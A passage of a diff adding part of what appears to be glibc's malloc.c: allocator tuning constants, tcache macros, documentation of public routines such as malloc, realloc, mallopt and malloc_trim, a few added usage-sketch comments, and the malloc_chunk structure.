+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+
+/* Maximum chunks in tcache bins for tunables.  This value must fit the range
+   of tcache->counts[] entries, else they may overflow.  */
+# define MAX_TCACHE_COUNT UINT16_MAX
+#endif
+
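+/*
+   Illustrative sketch, not from the glibc sources: the tcache bin index
+   arithmetic above, redone as a standalone program with the usual 64-bit
+   values hard coded (SIZE_SZ = 8, MALLOC_ALIGNMENT = 16, MINSIZE = 32); those
+   constants are assumptions of the sketch, not taken from this file.
+
+   #include <stddef.h>
+   #include <stdio.h>
+
+   #define SIZE_SZ           8
+   #define MALLOC_ALIGNMENT 16
+   #define MINSIZE          32
+
+   // Round a request up to the chunk size malloc would use.
+   static size_t req2size (size_t req)
+   {
+     size_t sz = req + SIZE_SZ;
+     return sz < MINSIZE
+            ? MINSIZE
+            : (sz + MALLOC_ALIGNMENT - 1) & ~(size_t) (MALLOC_ALIGNMENT - 1);
+   }
+
+   static size_t chunk2tidx (size_t csize)
+   {
+     return (csize - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT;
+   }
+
+   int main (void)
+   {
+     for (size_t req = 0; req <= 64; req += 8)
+       printf ("request %2zu -> chunk 0x%02zx -> tcache idx %zu\n",
+               req, req2size (req), chunk2tidx (req2size (req)));
+     return 0;
+   }
+*/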
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will,
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
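+
+/*
+  Illustrative usage sketch (not part of this file; uses only the public
+  realloc/free behavior described above): because realloc returns null and
+  leaves p untouched on failure, the old pointer must be kept until the new
+  one is known to be valid.
+
+    char *buf = malloc (100);
+    char *tmp = realloc (buf, 200);
+    if (tmp == NULL)
+      free (buf);     // growing failed; buf is still valid and still owned
+    else
+      buf = tmp;      // success; the old value of buf must not be used
+*/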
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
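+
+/*
+  Illustrative usage sketch (not part of this file; the parameter symbols
+  are the standard ones from <malloc.h> listed in the table above):
+
+    #include <malloc.h>
+
+    mallopt (M_MXFAST, 0);                   // disable fastbins entirely
+    mallopt (M_TRIM_THRESHOLD, 256 * 1024);  // trim when >256K is unused at top
+    mallopt (M_MMAP_MAX, 0);                 // never service requests via mmap
+
+  Each call returns 1 on success and 0 if the value was rejected.
+*/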
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
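+
+/*
+  Illustrative usage sketch (not part of this file; uses the public
+  mallinfo interface from <malloc.h> with the field meanings above):
+
+    #include <malloc.h>
+    #include <stdio.h>
+
+    struct mallinfo mi = mallinfo ();
+    printf ("arena: %d bytes, in use: %d bytes, free: %d bytes\n",
+            mi.arena, mi.uordblks, mi.fordblks);
+*/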
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
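+
+/*
+  Illustrative usage sketch (not part of this file): after freeing a large
+  working set, a long-lived program can ask the allocator to give unused
+  top-of-heap memory back, keeping (for example) 64K of slack for future
+  requests.
+
+    #include <malloc.h>
+
+    int released = malloc_trim (64 * 1024);  // 1 if memory was handed back
+*/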
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
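+
+/*
+  Illustrative usage sketch (not part of this file; standard POSIX interface
+  from <stdlib.h>): unlike memalign, the alignment must be a power of two
+  and a multiple of sizeof (void *), and the result is returned through
+  memptr rather than as the return value.
+
+    #include <stdlib.h>
+
+    void *p = NULL;
+    if (posix_memalign (&p, 64, 1024) == 0)
+      {
+        // p is 64-byte aligned and holds at least 1024 usable bytes
+        free (p);
+      }
+*/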
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set it to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than the page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped memory the kernel
+  simply has no choice but to zero it.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand any more. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
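+
+/*
+  Illustrative usage sketch (not part of this file): a program that knows
+  its large allocations are long-lived can pin the threshold instead of
+  relying on the sliding behaviour; note that setting it explicitly via
+  mallopt disables the dynamic adjustment described above.
+
+    #include <malloc.h>
+
+    mallopt (M_MMAP_THRESHOLD, 1024 * 1024);  // mmap requests of 1MB and up
+*/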
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
